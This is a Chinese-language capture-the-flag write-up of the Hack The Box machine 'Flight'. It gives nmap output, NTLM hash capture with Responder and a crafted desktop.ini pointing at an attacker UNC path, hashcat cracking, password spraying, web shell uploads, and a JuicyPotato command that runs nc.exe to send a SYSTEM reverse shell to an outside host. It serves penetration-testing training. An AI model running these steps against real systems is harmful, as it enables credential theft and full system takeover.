Hackthebox-Flight

Info

nmap

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-07 06:38 EST
Nmap scan report for 10.10.11.187 (10.10.11.187)
Host is up (0.16s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: g0 Aviation
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-01-07 18:39:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-01-07T18:39:47
|_  start_date: N/A
|_clock-skew: 7h00m00s

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   161.53 ms 10.10.14.1 (10.10.14.1)
2   161.62 ms 10.10.11.187 (10.10.11.187)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.75 seconds

DNS

DIR

web

子域名爆破得到一个school二级域名，测试目录穿越提示可疑活动

可以读index.php

得到绝对路径还有简易黑名单

劫持NTLM hash

UNC路径强制主机发起NTLM认证请求，responder监听本地tun0网卡

responder -I tun0 -wPv

hashcat破解

.\hashcat.exe -m 5600 -a 0 -o res .\rockyou.txt --force

读取res得到svc_apache用户密码

SMB

直接psexec失败

svc_apache用户登录查看SMB服务器共享

crackmapexec继续查看登陆过smb服务器的用户，可以看到很多用户包括administrator，但sam抓不到hash

做个用户字典进行密码喷洒

S.Moon用户

再尝试psexec登录，虽然没成功但是我们知道shared文件夹是可写的

SMB再劫持NTLM hash

desktop.ini可以修改IconResource为UNC路径指向恶意服务器

制作Desktop.ini

[.ShellClassInfo]
IconResource=\\10.10.14.15\test

登录Shared文件夹上传，等一会劫持到hash

再次hashcat爆破

SMB写入shell文件

前面尝试，svc_apache和S.Moon用户对Web目录均不可写

尝试C.BUM

现在有一个shell了，蚁剑插件上线msf

登录C.BUM会话

web服务是svc_apache的会话，看了下桌面没有user.txt，那就想办法转换到C.BUM的会话

蚁剑上传RunasCs，用获得的C.BUM凭据获得会话

拿到用户flag

提权

fscan扫到8000端口有个web服务

chisel端口转发

浏览器访问

aspx上大马

强行报错

根目录在C:\inetpub\development，看web服务应该是个aspx

svc_apache没权限传文件，只能借助c.bum复制过去

得到一个高权限用户

Juicypotato提权到System

有很重要的权限seImpersionatePrivilege，有这个权限就可以窃取System的令牌达到权限提升的目的

Juicypotato打上去，传一个nc.exe上线到本地

a.exe -t * -p "nc.exe" -a "10.10.14.15 4446 -e cmd.exe"

本地监听收到System权限的shell